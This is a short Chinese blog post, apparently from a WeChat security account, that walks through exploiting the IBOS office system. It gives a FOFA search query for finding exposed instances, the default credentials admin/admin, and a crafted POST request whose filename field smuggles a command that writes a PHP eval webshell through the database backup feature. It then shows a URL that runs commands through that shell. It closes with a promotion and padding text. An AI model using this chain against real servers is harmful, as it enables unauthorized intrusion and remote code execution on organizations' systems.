一、后台弱口令
fofa语句:
body="IBOS" && body="login-panel"
我们随便点一个进去
弱口令:admin/admin
但是经过多次测试发现存在弱口令的只有一两个,这就导致后面的步骤将无法继续进行,所以多找找就好
二、任意文件上传
这里我们已经到后台了,点通用设置->数据库->开启更多选项->选择系统 MySQL Dump (Shell) 备份这个选项
往下拉,点提交,抓包
在post数据里替换下面内容,上传shell
backuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=a3b4%26echo "<?php eval($_GET[a3b4]);?>">a3b4%PATHEXT:~0,1%php%26a3b4&dbSubmit=1
三、远程代码执行
接着当然就是访问shell了
http://xxx.xxx.xxx.xxx/a3b4.php?cmd=system(%22whoami%22);
访问个phpinfo
因为是win的,那就再来个dir
到这里结束啦
推荐一下公众号
bgbing星球:渗透测试,内网渗透,SRC漏洞分享,安全开发,安全武器库
更多渗透测试,可以到星球学习啦(送fofa高级会员)
凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数
本文始发于微信公众号(bgbing安全):IBOS 数据库模块 远程代码执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论